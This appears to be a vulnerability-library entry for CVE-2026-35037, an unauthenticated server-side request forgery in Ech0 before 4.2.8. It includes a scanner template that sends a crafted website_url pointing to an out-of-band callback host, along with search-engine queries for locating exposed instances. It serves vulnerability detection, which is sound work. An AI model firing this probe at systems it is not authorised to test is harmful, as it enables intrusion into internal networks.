/Vulnerability Library

Ech0 < 4.2.8 - Server-Side Request Forgery

CVE-2026-35037
Verified

Description

Ech0 before 4.2.8 exposes an unauthenticated SSRF vulnerability in GET /api/website/title. The website_url query parameter is fetched server-side without validating the target host or IP address.

Severity

High

CVSS Score

7.2

Exploit Probability

1%

Affected Product

ech0

Published Date

May 20, 2026

Template Author

fineman999

CVE-2026-35037.yaml
id: CVE-2026-35037

info:
  name: Ech0 < 4.2.8 - Server-Side Request Forgery
  author: fineman999
  severity: high
  description: |
    Ech0 before 4.2.8 exposes an unauthenticated SSRF vulnerability in GET /api/website/title. The website_url query parameter is fetched server-side without validating the target host or IP address.
  reference:
    - https://github.com/lin-snow/Ech0/security/advisories/GHSA-cqgf-f4x7-g6wc
    - https://nvd.nist.gov/vuln/detail/CVE-2026-35037
  classification:
    cve-id: CVE-2026-35037
    epss-score: 0.00618
    epss-percentile: 0.46889
    cwe-id: CWE-918
    cvss-score: 7.2
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
  metadata:
    verified: true
    vendor: lin-snow
    product: ech0
    max-request: 1
    shodan-query: title:"Ech0"
    fofa-query: title:"Ech0"
  tags: cve,cve2026,ech0,ssrf,oast,oss

http:
  - raw:
      - |
        GET /api/website/title?website_url=http://{{interactsh-url}}/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 400'
          - 'contains(body, "data\":")'
          - 'contains(interactsh_protocol, "http")'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4b0a00483046022100ea7681ec435ed855bdd1fa4b1d678cde10327ad06f0d8af605cf4e282e0e8bf3022100d1d5a6de9432b30c329b58c33c9703308b9ceefc7d211c70f5bcb528e1f6bcfa:922c64590222798bb761d5b6d8e72950
7.2Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
CVE ID:
cve-2026-35037
CWE ID:
cwe-918

References

https://github.com/lin-snow/Ech0/security/advisories/GHSA-cqgf-f4x7-g6wchttps://nvd.nist.gov/vuln/detail/CVE-2026-35037